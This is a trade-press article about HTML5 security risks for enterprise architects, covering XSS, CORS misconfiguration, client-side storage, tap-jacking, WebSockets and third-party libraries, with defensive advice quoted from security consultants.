freshidea - Fotolia

Why HTML5 security needs to be at the forefront of architects' minds

New features means there are also new threats that require Web developers and administrators to keep HTML5 security a top priority.

HTML5 is emerging as the de-facto standard for rolling out new services that create business value for PC-based browser applications, and is a leading choice for mobile applications, as well. Considering, enterprise architects need to adopt a cautious and holistic approach to HTML5 security, ensuring it at forethought, rather than it being a problem to be fixed after a breach has occurred.

As David Eads, founder of Mobile Strategy Partners , an Internet security consultancy, observed, "HTML5 security is improving as more and more people focused on mobile are getting up to speed from a security perspective. But there is still a long way to go, and it is moving super fast. You only need one hole to have a major breach."

Enterprise architects need to consider the entire software development lifecycle as they ponder the best strategy for increasing HTML5 security in applications. Ensuring Web applications and Web servers are properly and securely configured is critical. Most exploitation techniques will rely on vulnerabilities or weaknesses in Web applications or server settings, which can be addressed by hardening and disabling features. Jerome Segura, senior security researcher at Malwarebytes Labs, said, "Unfortunately, this is up to Web developers and administrators to do a good job of securing their resources, which of course implies a proper understanding of the threats."

HTML5 security highlights

HTML5 brought a wide variety of new capabilities into standards-based browser applications, which can run across browsers and clients. However, an early assessment from the European Network and Information Security Agency found that it also baked in 51 major vulnerabilities. 

Geoffrey Vaughan, security consultant at Security Compass, a security tools vendor, said HTML5 includes a number of new vulnerabilities that have a higher than normal impact and likelihood to occur, including security misconfiguration, cross-site scripting (XSS), access to local storage, and tap-jacking or cross-frame scripting:

  • Security misconfiguration/cross-origin resource sharing (CORS) issues are especially likely with multi-deployment platforms. All of the multi-deployment development platforms come preconfigured with some security vulnerabilities, meaning if their configurations are not properly hardened, they will introduce vulnerabilities into the application.
  • XSS has a much higher impact, as it allows Web applications to access native features. HTML 5 applications provide access to JavaScript and special tags to access native phone elements. If an attacker is able to leverage an XSS attack they could gain more access to a larger quantity of personal data.
  • The manner in which enterprises make use of HTML5's additional local storage capabilities can introduce additional security issues. The main threat is if any sensitive data is stored on the device and it is lost, stolen or compromised, that data could be easily leaked.
  • HTML5 simplifies the development of Web applications that operate across frames and layers. This capability, coupled with poor CORS policies, increases the risk of tap-jacking for HTML5 applications compared with older HTML specifications. The risk is more significant and easier to hide for mobile applications where browser elements, such as the navigation and URL bars, can be hidden.
  • The WebSockets protocol introduces a new transport vector into the enterprise architecture. "This means HTTP-aware defenses [local antivirus or Web application firewalls] will not easily be able to classify the nature of the traffic," said Joe Bulman, senior systems architect for Wedge Networks, a security tools vendor.

Security education is imperative

Organizations need to think about incorporating security education into their developer training program to address these problems, argued Mark Hammond, senior director of security consulting at Neohapsis, a security and risk management consulting company. This includes a stricter focus on access control compromise, injection and CORS attacks. Developers should also consider investigating the use of a content security policy to help mitigate some of these attacks.

It's also important to think about including a formal application security practice into this training, said Bulman. They should be familiar with standards such as OWASP, related security tools, libraries and best practices, such as penetration testing. He said, "In a security application development practice, powerful HTML5 features such as local storage and cross-origin scripting can be deployed securely."

New features = new attack surfaces

One concern among security experts is that the HTML5 stack is implemented and available on both mobile and Web browsers. "Hence, HTML5 attack vectors have relatively wider reach on a case-to-case basis, said Shreeraj Shah, founder and director of Blueinfy Solutions, a Web security tools vendor.

There are many different attack vectors introduced by HTML5, which in some cases are a result of new features making the attack surface larger, or because new implementations can render known mitigation techniques useless. Of particular concern is the potential for the implementation of attacks by hackers before security experts can find them.

These features include:

  • Canvas for programmable drawing
  • WebGL for rendering 3-D graphics
  • Local storage
  • Data store on the client side
  • Geolocation
  • History manipulation
  • Cross-domain origins
  • Media tags
  • Content security policy
  • Local file-system access
  • Web messaging
  • Web workers

Shah explained, "A very large attack surface is getting exposed and there are troubling issues -- depending on the usage of features and components."

Some of the established problems from this larger attack system allow hackers to leverage HTML5 components in order to launch client-side attacks like XSS and CSRF, which are on the OWASP top 10 list of Web application vulnerabilities. Shah noted that HTML5 allows hackers to leverage XSS vulnerabilities to access user information since browsers are often configured to sensitive information about the user in their HTML5-based data store, storage and file system. Canvas, history manipulation and a few other features are getting leveraged from a privacy standpoint. For example, canvas fingerprinting methods are used to identify a unique browser.

The use of HTML5 also expands the attack surface of the servers behind the applications, Shah noted. HTML5 components are leveraging SOA back ends by calling JSON, SOAP or REST through JavaScript. The boundary of presentation, business logic and data access layers are now thin, and lot of components are part of the HTML5 side of JavaScript. "Hence, it is possible to dissect those components and reverse-engineer the business logic. It allows an attacker to perform and exploit real business-layer functionalities," Shah said.

Caching and local storage

New capabilities in HTML5 make it easier to store data on the client side. These local storage techniques show promise for speeding application performance and allowing applications to continue to function even when the client goes offline. Without proper management, security and encryption, the same data could be leveraged by malicious hackers.

While there are tools for securing and encrypting this data on the client side, they are not failsafe, Eads argued.  "It is not proven unhackable. It is still too risky to store sensitive data on the client for most use cases. Also, it's not clear that there are advantages to storing data on the client side, given the management gymnastics involved."

Eads pointed out that in some cases native applications can provide better security for local storage, particularly on the iOS platform. On the other hand, Android platforms are more commonly rooted, which can obviate some of the security measures built into the platform.

Eads does make an exception for this general rule when the enterprise has greater control over the client using tools for mobile device management (MDM) and mobile application management (MAM). He said, "You have mitigation controls with MDM and MAM. It is good system architecture to have those controls in place. But there are organizations that store data on the client without these that put themselves at serious risk."

Third-party code (beware of libraries)

Many enterprises turn to HTML5 development libraries to reduce the amount of time and improve the quality of new applications. This can lead to problems if the libraries contain vulnerabilities, or if the source code has been compromised by hackers. For most HTML5 applications, all JavaScript code -- including third-party code -- runs at the same security level. This means a potential security vulnerability or a bug in a third-party library can compromise the entire browser runtime. 

Brad Carleton, founder and CTO of TechPines, an application development firm explained, "The more libraries you use, the more complicated these problems get.  I'd say the biggest security precaution one can take is to thoroughly vet all third-party code before use. For special cases, where lots of potentially 'untrusted' third-party code might be run in the browser, there are a few tricks that can be used to create more secure setups using HTML5 Web Workers and iFrame sandboxing."

About the author:
George Lawton is a journalist based near San Francisco. Over the last 15 years, he's written more than 2,000 articles on computers, communications, business and other topics. Find out more at

Follow us on Twitter at @SearchSOA and like us on Facebook.

Next Steps

What you need to know about the HTML5 standard

The ups and downs to using HTML5 in the enterprise

How HTML5 has changed Web application development

Dig Deeper on Distributed application architecture